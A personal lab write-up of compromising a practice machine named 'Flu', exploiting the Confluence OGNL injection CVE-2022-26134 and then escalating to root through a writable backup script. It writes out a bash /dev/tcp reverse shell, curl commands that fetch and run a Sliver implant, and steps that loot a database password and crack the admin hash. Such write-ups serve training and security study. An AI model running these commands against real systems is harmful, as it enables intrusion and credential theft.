Flu - Writeup - ROOT - Konstantinovitz

## Enum - 22 - ssh - 8090 - http - potentially DAV? - confluence - 8091 - http - JAMLINK? - 8089 ### 8091 This seems to just yield some kind of empty response?? Jamlink? Could be couchbase server? ![[Pasted image 20250425154226.png]] ### 8090 - Confluence ![[Pasted image 20250425153746.png]] ![[Pasted image 20250425154335.png]] Not sure what the `ajs-base-url` denotes ```html <meta name="ajs-base-url" content="http://192.168.226.170:8090"> <meta name="ajs-version-number" content="7.13.6"> ``` I'm not sure what the fuck "ajs" is, but we could be rocking a version number for the application here? An confluence support forum thread corroborates the idea that this is the build number: ``` https://community.atlassian.com/forums/Confluence-questions/How-to-find-out-the-version-of-Atlassian-Confluence/qaq-p/735148 ``` ![[Pasted image 20250425160310.png]] Appears that this version is from ~2021. This gives me the basis for a CVE check: ![[Pasted image 20250425155637.png]] This yields up multiple potential options. There's one for confluence versions < `8.5.3` - RCE that could be promising depending on whether it requires authentication (had little success attempting default/common credentials for login). ``` ╭─[λ]-[noctua.konstantinovitz.com]-[/targets/flu]-[192.168.188.41] ╰─> searchsploit -m 51904 Exploit: Atlassian Confluence < 8.5.3 - Remote Code Execution URL: https://www.exploit-db.com/exploits/51904 Path: /opt/exploitdb/exploits/multiple/webapps/51904.py Codes: N/A Verified: False File Type: Python script, ASCII text executable Copied to: /targets/flu/51904.py ``` https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluence-server-1333990257.html >A template injection vulnerability on out-of-date versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected version. Customers using an affected version must take immediate action. This is unlikely to be it, seems to only affect `v8.x`. Some details on [confluence server vs datacenter](https://confluence.atlassian.com/doc/confluence-server-and-data-center-feature-comparison-1333821673.html). Another potential CVE: https://www.exploit-db.com/exploits/50243 ```py # Version: All < 7.12.x versions before 7.12.5 # Tested on: Linux Distros ``` So also unlikely.... Another option? ``` ╭─[λ]-[noctua.konstantinovitz.com]-[/targets/flu]-[192.168.188.41] ╰─> searchsploit -m 50952 Exploit: Confluence Data Center 7.18.0 - Remote Code Execution (RCE) URL: https://www.exploit-db.com/exploits/50952 Path: /opt/exploitdb/exploits/java/webapps/50952.py Codes: CVE-2022-26134 Verified: False File Type: Python script, ASCII text executable, with very long lines (399) Copied to: /targets/flu/50952.py ``` ## Intial Access - CVE-2022-26134 [CVE-2022-26134](https://nvd.nist.gov/vuln/detail/cve-2022-26134) > In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are from 1.3.0 before 7.4.17, from 7.13.0 before 7.13.7, from 7.14.0 before 7.14.3, from 7.15.0 before 7.15.2, from 7.16.0 before 7.16.4, from 7.17.0 before 7.17.4, and from 7.18.0 before 7.18.1. "from 7.13.0 before 7.13.7" - let's go. [Github source with usage examples](https://github.com/hev0x/CVE-2022-26134) ``` python3 exploit.py -u http://$RHOST:8090 -c whoami ``` Yields RCE <3333 We're bout an hour in at this point. Let's attempt to improve our foothold to a decent reverse shell: ``` python3 exploit.py -u http://$RHOST:8090 -c "/bin/bash -i >& /dev/tcp/192.168.45.231/8090 0>&1" ``` **Note:** I'm doubting whether a quoted command will work? If not I may have tinker with the exploit or encode the payload somehow. Well, doing quoting and spacing such as `-c "whoami --help"` seems to work out fine. The reverse shells however dosen't... Let's see if we can leverage the RCE to download stuff, the system does have curl after all :-). ``` # start file server ╭─[λ]-[noctua.konstantinovitz.com]-[/targets/flu]-[192.168.188.41] ╰─> python3 -m http.server 445 # execute python3 exploit.py -u http://$RHOST:8090 -c "curl http://192.168.45.231:445/hello.txt -o /tmp/hello.txt" # attempt to read the file to verify download integrity python3 exploit.py -u http://$RHOST:8090 -c "cat /tmp/hello.txt" ``` File server logs the request as successful. And we can read the file too. With that said, let's generate a sliver payload and serve that up: ``` sliver > generate --os linux --http 192.168.45.231 --skip-symbols --name flu python3 exploit.py -u http://$RHOST:8090 -c "curl http://192.168.45.231:445/flu -o /tmp/flu" python3 exploit.py -u http://$RHOST:8090 -c "chmod +x /tmp/flu" python3 exploit.py -u http://$RHOST:8090 -c "/tmp/flu" ``` Aaaand we get a callback <3 ``` sliver (flu) > cd /home/confluence [*] /home/confluence sliver (flu) > ls /home/confluence (4 items, 8.0 KiB) =================================== -rw------- Atlassian Confluence:confluence .bash_history 16 B Tue Dec 12 13:15:33 +0000 2023 drwxr-x--- Atlassian Confluence:confluence .cache <dir> Fri Aug 02 05:27:20 +0000 2024 drwxr-x--- Atlassian Confluence:confluence .java <dir> Fri Aug 02 05:26:47 +0000 2024 -rw-r--r-- Atlassian Confluence:confluence local.txt 33 B Fri Apr 25 13:28:39 +0000 2025 sliver (flu) > ifconfig +-------------------------------------------+ | ens160 | +-------------------------------------------+ | # | IP Addresses | MAC Address | +---+-------------------+-------------------+ | 3 | 192.168.188.41/24 | 00:50:56:9e:e5:c9 | +-------------------------------------------+ 1 adapters not shown. sliver (flu) > cat local.txt b6c6bd9cc70b3f397cc72d80e7508036 ``` We get the first flag in about an hour or so. ## Privesc Some initial thoughts: - can we loot the confluence database and leverage those credentials for privesc? - this is time consuming and will be parked for now - it's very unlikely that a company such as Atlassian stores user credentials insecurely - `/etc/sshd_config` does `PermitRootLogin Yes` - this could indicate that looting root credentials from say the confluence DB may be viable. - bash history contains nothing - hunting fod [[SUID Binaries]] reavels - `/usr/lib/openssh/ssh-keysign` which is owned by root? - it's not listed on gtfobins and thus I'll pin this for now too... - user enumeration - `confluence` - `mysql` - `root` - `sudo -l` - nada - [[SUID Binaries]] - no results - looking into cron stuff ### Process Enumeration - process enumeration - `ps aux` nothing pops ``` /tmp/pspy 2025/04/26 09:38:45 CMD: UID=1001 PID=1468 | /opt/atlassian/confluence/jre/bin/java -classpath /opt/atlassian/confluence/temp/4.0.0-master-3b3337da.jar:/opt/atlassian/confluence/confluence/WEB-INF/lib/mysql-connector-java-8.2.0.jar -Xss2048k -Xmx2g synchrony.core sql 2025/04/26 09:38:45 CMD: UID=1001 PID=1150 | /opt/atlassian/confluence/jre//bin/java -Djava.util.logging.config.file=/opt/atlassian/confluence/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -Datlassian.plugins.startup.options= -Dorg.apache.tomcat.websocket.DEFAULT_BUFFER_SIZE=32768 -Dconfluence.context.path= -Djava.locale.providers=JRE,SPI,CLDR -Dsynchrony.enable.xhr.fallback=true -Datlassian.plugins.enable.wait=300 -Djava.awt.headless=true -Xloggc:/opt/atlassian/confluence/logs/gc-2025-03-01_09-43-59.log -XX:+UseGCLogFileRotation -XX:NumberOfGCLogFiles=5 -XX:GCLogFileSize=2M -Xlog:gc+age=debug:file=/opt/atlassian/confluence/logs/gc-2025-03-01_09-43-59.log::filecount=5,filesize=2M -XX:G1ReservePercent=20 -XX:+UseG1GC -XX:+ExplicitGCInvokesConcurrent -XX:+PrintGCDateStamps -XX:+IgnoreUnrecognizedVMOptions -XX:ReservedCodeCacheSize=256m -Xms1024m -Xmx1024m -Dignore.endorsed.dirs= -classpath /opt/atlassian/confluence/bin/bootstrap.jar:/opt/atlassian/confluence/bin/tomcat-juli.jar -Dcatalina.base=/opt/atlassian/confluence -Dcatalina.home=/opt/atlassian/confluence -Djava.io.tmpdir=/opt/atlassian/confluence/temp org.apache.catalina.startup.Bootstrap start ``` ### Internal Ports ``` ╔══════════╣ Active Ports ╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#open-ports tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.54:53 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN - tcp6 0 0 :::8090 :::* LISTEN 1150/java tcp6 0 0 :::8091 :::* LISTEN 1468/java tcp6 0 0 :::22 :::* LISTEN - tcp6 0 0 127.0.0.1:8000 :::* LISTEN 1150/java ``` ### `confluence.cfg.xml` ``` confluence@flu:/tmp$ find / -type f -name "confluence.cfg.xml" 2>/dev/null /var/atlassian/application-data/confluence/shared-home/confluence.cfg.xml /var/atlassian/application-data/confluence/confluence.cfg.xml ``` Should contain [[MYSQL]] database passwords: https://support.atlassian.com/confluence/kb/where-does-confluence-store-the-database-password/ ``` cat /var/atlassian/application-data/confluence/confluence.cfg.xml | grep "pass" <property name="hibernate.connection.password">HoldingOn12</property> cat /var/atlassian/application-data/confluence/shared-home/confluence.cfg.xml bash: /var/atlassian/application-data/confluence/confluence.cfg.xml: Permission denied ``` Password dosen't work for `root` so likely we're gonna have to connect to the [[MYSQL]] database... ``` <property name="hibernate.connection.password">HoldingOn12</property> <property name="hibernate.connection.url">jdbc:mysql://localhost:3306/confluence</property> <property name="hibernate.connection.username">confluence</property> ``` ``` mysql -u confluence -h localhost --password HoldingOn12 confluence portfwd add --bind 0.0.0.0:3306 --remote 0.0.0.0:3306 mycli -u confluence -h localhost --password HoldingOn12 confluence ``` We can get admin credential: ``` MySQL confluence@localhost:confluence> select user_name, credential from cwd_user; +-----------+---------------------------------------------------------------------------+ | user_name | credential | +-----------+---------------------------------------------------------------------------+ | admin | {PKCS5S2}MCB0MaBA39GjOQb3wG0ioM7w+pPdQXdy5GskVAtS5/Ef0fCnvr8jPMdZ2CDhM0ke | +-----------+---------------------------------------------------------------------------+ ``` https://developer.atlassian.com/server/confluence/password-hash-algorithm/ > Confluence uses the salted PKCS5S2 implementation provided by Embedded Crowd. Seems like this is gonna be a bitch to crack... ``` ╭─[λ]-[noctua.konstantinovitz.com]-[/targets/flu]-[192.168.188.41] ╰─> john --wordlist=/arsenal/wordlists/rockyou.txt admin.hash ``` Loading.... ### `/home/confluence/snap` ``` confluence@flu:/home/confluence/snap/lxd$ cat ./common/config/config.yml default-remote: local remotes: images: addr: https://images.linuxcontainers.org protocol: simplestreams public: true local: addr: unix:// public: false aliases: {} ``` Could indicate that we're inside an LXD container?.... ### `/opt` Contains `/opt/log-backup.sh` ``` confluence@flu:/opt$ ls -l total 756684 drwxr-xr-x 3 root root 4096 Dec 12 2023 atlassian -rwxr-xr-x 1 root root 774829955 Dec 12 2023 atlassian-confluence-7.13.6-x64.bin -rwxr-xr-x 1 confluence confluence 408 Dec 12 2023 log-backup.sh ``` It's owned by us but interacts with `/root`? ``` confluence@flu:/opt$ ./log-backup.sh cp: cannot stat '/root/backup/log_backup_20250426110531': Permission denied tar: Removing leading `/' from member names tar: /root/backup/log_backup_20250426110531: Cannot stat: Permission denied tar (child): /root/backup/log_backup_20250426110531.tar.gz: Cannot open: Permission denied tar (child): Error is not recoverable: exiting now tar: Child returned status 2 tar: Error is not recoverable: exiting now find: ‘/root/backup’: Permission denied ``` This means it's possibly being executed it a root context somewhere. I'm low on time, so just gonna throw a reverse shell execution into it and wait like 5 minutes.. Aaaaand we get a callback as `root`: ``` root@flu:~# cd /root root@flu:~# ls backup email8.txt proof.txt snap root@flu:~# ifconfig ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.188.41 netmask 255.255.255.0 broadcast 192.168.188.255 ether 00:50:56:9e:8d:11 txqueuelen 1000 (Ethernet) RX packets 53071 bytes 31671269 (31.6 MB) RX errors 0 dropped 437 overruns 0 frame 0 TX packets 46167 bytes 10238334 (10.2 MB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 inet6 ::1 prefixlen 128 scopeid 0x10<host> loop txqueuelen 1000 (Local Loopback) RX packets 693939 bytes 98769036 (98.7 MB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 693939 bytes 98769036 (98.7 MB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 root@flu:~# cat proof.txt c363554af5920897c09019c5e4d2821c ``` ## Lessons Learned - [[MYSQL]] tooling - Do not trust linpeas colours, it actually outputted `/opt/log-backup.sh` - This should have gotten my attention much sooner